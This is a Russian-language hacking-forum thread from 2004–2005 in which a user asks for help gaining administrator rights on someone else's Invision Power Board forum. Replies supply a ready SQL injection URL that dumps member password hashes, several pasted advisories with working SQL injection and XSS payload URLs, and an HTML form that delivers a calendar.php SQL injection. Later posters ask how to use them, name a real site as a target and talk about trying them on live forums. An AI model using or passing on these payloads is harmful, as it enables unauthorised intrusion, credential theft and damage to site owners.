Форумы Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.

Discussion in 'Уязвимости CMS/форумов' started by dukalis(AwP), 16 Dec 2004.

  1. dukalis(AwP)

    dukalis(AwP) New Member

    Joined:
    16 Dec 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет! Срочно очень нужна помощь!!!
    Есть форум Invision Power Board(U) v1.3 PF1
    (именно такой! не путать с бест фалйз!)
    Нужно удалить на таком форуме раздел, то бишь получить права администратора! Пожалуйста, очень прошу помощи!
     
  2. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    578
    Likes Received:
    274
    Reputations:
    91
    Если не стоят патчи, то можно воспользоваться кучей штук. Была какая-то бага которая позваляла выполнить Sql запрос тобишь хеши можно поиметь.
     
  3. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
     
  4. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    А для v1.3.1 Final нету ничего умного???
     
  5. uf0

    uf0 New Member

    Joined:
    28 Jan 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    *************************************
    SQL инъекция в Invision Power Board
    Программа: Invision Power Board 1.3.1
    Опасность:

    Наличие эксплоита: Да

    Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может внедрить SQL команды.

    'ssi.php' не проверяет данные, представленные пользователем. Пример:

    http://[target]/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION]

    URL производителя: http://www.invisionboard.com/

    Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

    **********************************

    **********************************

    Раскрытие инсталляционного пути в Invision Power Board
    Программа: Invision Power Board 1.3 Final
    Опасность: Низкая

    Наличие эксплоита: Да

    Описание: Уязвимость раскрытия информации обнаружена в Invision Power Board. Удаленный авторизованный пользователь может определить инсталляционный путь.

    Пример/Эксплоит:

    http://[target]/forum/index.php?act=UserCP&CODE=photo
    ************************************

    Межсайтовый скриптинг в Invision Power Board
    Программа: Invision Power Board 1.3 Final
    Опасность: Низкая

    Наличие эксплоита: Да

    Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

    Форум не проверяет правильность данных, представленных пользователем в поле ‘pop’.

    Пример/Эксплоит:

    http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be
    your cookie')</script><plaintext>

    *******************************


    Межсайтовый скриптинг в Invision Power Board
    Программа: Invision Power Board 1.3 Final
    Опасность: Низкая

    Наличие эксплоита: Да

    Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

    Параметры 'c', 'f', 'showtopic', 'showuser', и 'username' не фильтруют HTML код, представленный пользователем:

    http://[target]/?c='><script>alert(window.document.url)</script><plain text>
    http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext>
    http://[target]/?act=SR&f='><script>alert(document.cookie)</script>
    http://[t arget]/?showuser='><script>alert(document.cookie)</script>
    http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>

    URL производителя:http://www.invisionboard.com/

    SQL инъекция в Invision Power Board
    Программа: Invision Power Board все версии
    Опасность: Высокая

    Наличие эксплоита: Да

    Описание: Уязвимость обнаружена в Invision Board Forum в "sources/search.php". Удаленный пользователь может выполнить произвольный SQL код на основной базе данных.

    Уязвимый код:


    if (isset($ibforums->input['st']) )
    {
    $this->first = $ibforums->input['st'];
    }

    Пример/Эксплоит:

    http://www.board.com/forum/index.php?act=S...v=lv&CODE=show&
    searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/*
    *********************************

    SQL инъекция в Invision Power Board
    Программа: Invision Power Board 1.3 FINAL
    Опасность: Высокая

    Наличие эксплоита: Да

    Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.

    Уязвимость обнаружена в сценарии sources/calendar.php в параметре 'request'.

    Пример/Эксплоит:

    <html>
    <head><title>
    Invision Power Board Free 1.3 FINAL SQL Injection Problems
    </title></head>
    <body>
    <form action='/index.php?act=calendar' method='post'
    onsubmit="this.m.value='2 )) UNION
    '+this.request.value+'#';this.action=this.url.value+this.action;">
    <b>IPB directory URL :</b> <input type='text' size='45' name='url'
    value='http://forum.target.com'><br><br>
    <b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'
    value='SELECT * FROM ibf_calendar_events'><br><br>
    <u>Attention :</u> The request result MUST have this structure :<br><br>
    INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,
    INT,INT,STR,STR<br><br>
    <input type='hidden' name='y' value='2004'>
    <input type='hidden' name='m'>
    <input type='submit' value='Execute'>
    </form>
    <br><br><br>
    <p align="right">A patch can be found on <a
    href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
    For more informations about this exploit :
    <a href="http://www.security-corporation.com/advisories-025.html"
    target="_blank">
    Security-Corporation.com</a></p>
    </body>
    </html>

    URL производителя: http://www.invisionboard.com
     
  6. SEVKA

    SEVKA Banned

    Joined:
    14 Mar 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Люди а вы не могли бы по подробнее так сказать на пальцах обячнить как этим пользоваться ?
     
  7. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    оставляй форум протестим ;)
     
  8. SEVKA

    SEVKA Banned

    Joined:
    14 Mar 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    так разобраться хочу а то чужими руками то даж не интересно
     
  9. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    Не, лучше не оставляй ссылку на форум, а то они быыыыыстро его снеут)))
     
  10. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    это верно :D
     
  11. advlam

    advlam New Member

    Joined:
    11 Mar 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    SQL инъекция в Invision Power Board
    Программа: Invision Power Board 1.3.1
    Опасность:
    
    Наличие эксплоита: Да
    
    Описание: Уязвимость обнаружена в Invision Power Board. Удаленный пользователь может внедрить SQL команды.
    
    'ssi.php' не проверяет данные, представленные пользователем. Пример:
    
    [url]http://[target]/ssi.php?a=out&type=xml&f=0[/url])[SQL-INJECTION]
    
    URL производителя: [url]http://www.invisionboard.com/[/url]
    
    Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
    что можно сделать с этой sql? напишите пример запроса этого
     
  12. advlam

    advlam New Member

    Joined:
    11 Mar 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    cards.donpac.ru
     
  13. White Jordan

    White Jordan Guest

    Reputations:
    0
    Ой не давай не давай ато взломаем....=))))
     
  14. Zingara

    Zingara Elder - Старейшина

    Joined:
    28 Feb 2005
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Ребят, вопрос глупый и нескромный... а эти уязвимрсти на данный момент еще присутствуют? А то руки чешутся на одном форуме опыты провести...
     
  15. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    457
    Likes Received:
    212
    Reputations:
    168
    Ну оч мало таких осталось...
    хотя пару ссыл досих пор работают...
    но это нада быть полным аленем что бы оставить эти баги
     
Loading...